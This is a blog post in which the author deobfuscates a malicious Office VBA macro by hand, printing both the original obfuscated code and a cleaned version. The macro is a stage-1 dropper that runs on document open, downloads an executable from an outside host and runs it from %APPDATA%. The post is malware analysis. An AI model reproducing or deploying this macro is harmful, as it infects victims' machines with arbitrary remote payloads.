Deobfuscating malware by hand

Somehow, I became a proud new owner of a piece of (somewhat) malicious code tonight.  Once making sure it was properly neutered, and after running it through VirusTotal and being surprised by how few (9/55) engines were detecting it, I decided to take a look.

Sub HCYh58Llju(ByRef iKvmUvcYr3wp, ByVal Q3REKGitD, ByVal kwoeg8c)
 iKvmUvcYr3wp = Split(Q3REKGitD, kwoeg8c)
End Sub

Sub S1HL1_C(ByVal LL3FDJzJgC, ByVal cOdzspoHpj)
 On Error Resume Next
 xDyHfiQQsRQ8 = cOdzspoHpj.responseBody
 LL3FDJzJgC.Write xDyHfiQQsRQ8
End Sub

Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
 Const KMKM = "km "
 Const CCCC = " c"

 Dim q7bPJ655QjSG
 HCYh58Llju q7bPJ655QjSG, StrReverse("|exe.tsohnvs\etadpUdnW\%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS"), "|"

 Dim nPtKNIjU35IQ
 Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
 C4KAAHcn = nPtKNIjU35IQ.ExpandEnvironmentStrings(q7bPJ655QjSG(4))

 jnF1QSEGIA = Split(C4KAAHcn, "\")
 R9Z8D2tPkYNy = UBound(jnF1QSEGIA)
 
 nPtKNIjU35IQ.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & Mid(C4KAAHcn, 1, Len(C4KAAHcn) - Len(jnF1QSEGIA(R9Z8D2tPkYNy))) & """", 0, True

 Set v8t0w6fxasM = CreateObject(q7bPJ655QjSG(1))
 v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False
 v8t0w6fxasM.setRequestHeader "Cache-Control", "no-cache, no-store"

 Set n7nUrIZKvU2A = CreateObject(q7bPJ655QjSG(2))
 n7nUrIZKvU2A.Open
 v8t0w6fxasM.send
 n7nUrIZKvU2A.Type = 1
 Application.Run "S1HL1_C", n7nUrIZKvU2A, v8t0w6fxasM
 Application.Run "h2xPVFcahn", n7nUrIZKvU2A, C4KAAHcn
 n7nUrIZKvU2A.Close
 nPtKNIjU35IQ.Run "c" & StrReverse(""" """" trats" & " c" & HUiu827TYRH) & C4KAAHcn & """", 0, False
End Sub

Function h2xPVFcahn(ByVal n7nUrIZKvU2ATMP, ByVal C4KAAHcnTMP)
 n7nUrIZKvU2ATMP.SaveToFile C4KAAHcnTMP, 2
End Function

Sub Workbook_Open()
 On Error Resume Next
 AutoOpen
End Sub

Oh noes .. it’s teh crypted!!!  No, of course not.  Someone just thought they’d be funny and obfuscate this to make it a bit tougher to figure out what they’ve done.  Because, you know, StrReverse(StrReverse(StrReverse(…))) is 3 times better than a single StrReverse!!

So anyway, sarcasm aside (yeah, right), this is nothing more difficult than the cryptoquote in your Sundary newspaper or the (really great!) puzzles at the end of every Gravity Falls episode.

So let’s get out the text editor and start doing some simple search and replace.

First — let’s remove all the silly StrReverse functions.  It’s pretty easy to pick out the most interesting, and reverse it from the CLI:

Please mentally ignore all occurrences of “<DONT_GO_HERE>” — I just injected them because I didn’t trust this blog to not automagically make those URLs clickable.

$ echo "|exe.tsohnvs\etadpUdnW\%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS" | rev

Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dalinam<DONT_GO_HERE>sdelo43.<DONT_GO_HERE>com/posts/dli506.exe|%APPDATA%\WndUpdate\svnhost.exe|

Of course, this now makes it pretty obvious that the subroutine named “HCYh58Llju” is just taking a string delimited by “|” and splitting it up into an array — so do a quick “s/HCYh58Llju/splitter_func/” on the file, just to make it easier to read.

The rest of the steps are pretty easy to follow — just keep finding easy string concatenation or reversal, and do a search and replace on obfuscated names once you figure out what they do.  Here is the final result of my analysis:

//Sub splitter_func(ByRef splitted, ByVal urlstr, ByVal seperator)
// splitted = Split(urlstr, seperator)
//End Sub
Sub write_xmlhttp_response_to_stream_func(ByVal LL3FDJzJgC, ByVal xmlhttp_objTMP)
 On Error Resume Next
 xml_responsebody_obj = xmlhttp_objTMP.responseBody
 adodb_objTMP.Write xml_responsebody_obj
End Sub
Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = "/ dm"
 Const KMKM = "km "
 Const CCCC = " c"
Dim splitted_data
// splitter_func splitted_data, "Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dal<DONT_GO_HERE>inamsdelo43.co<DONT_GO_HERE>m/posts/dli506.exe|%APPDATA%\WndUpdate\svnhost.exe|", "|"
splitted_data=("Shell","Microsoft.XMLHTTP","ADODB.Stream","http://da<DONT_GO_HERE>linamsd<DONT_GO_HERE>elo43.c<DONT_GO_HERE>om/posts/dli506.exe","%APPDATA%\WndUpdate\svnhost.exe")
Dim wscript_shell_obj
 Set wscript_shell_obj = CreateObject("WScript.Shell")
 wndupd_location_str = wscript_shell_obj.ExpandEnvironmentStrings("%APPDATA%\WndUpdate\svnhost.exe")
wndupd_location_parts = Split(wndupd_location_str, "\")
 highest_index_of_wndupd_loc_parts = UBound(wndupd_location_parts)
#MJS Make a directory in APPDATA
 wscript_shell_obj.Run "cmd /cmkdir "%APPDATA%\WndUpdate\""", 0, True
Set xmlhttp_obj = CreateObject("Microsoft.XMLHTTP")
 xmlhttp_obj.Open "GET", "http://dal<DONT_GO_HERE>inamsdelo<DONT_GO_HERE>43.c<DONT_GO_HERE>om/posts/dli506.exe", False
 xmlhttp_obj.setRequestHeader "Cache-Control", "no-cache, no-store"
Set adodb_obj = CreateObject("ADODB.Stream")
 adodb_obj.Open
 xmlhttp_obj.send
 adodb_obj.Type = 1
 Application.Run "write_xmlhttp_response_to_stream_func", adodb_obj, xmlhttp_obj
 Application.Run "save_stream_to_file_func", adodb_obj, wndupd_location_str
 adodb_obj.Close
 wscript_shell_obj.Run "cmd /cstart "%APPDATA%\WndUpdate\svnhost.exe""", 0, False
End Sub
Function save_stream_to_file_func(ByVal adodb_objTMP, ByVal wndupd_location_strTMP)
 adodb_objTMP.SaveToFile wndupd_location_strTMP, 2
End Function
Sub Workbook_Open()
 On Error Resume Next
 AutoOpen
End Sub

Conclusion:

This was a stupid exercise.  All this script does is create a directory in %APPDATA%, downloads a file from a random site, names is svnhost.exe locally, and then executes that file.  Pretty straightforward stage 1 payload.  The real fun, of course, is in analyzing stage 2.  But I’ll leave that for the pros ….

Advertisements
  1. Leave a comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: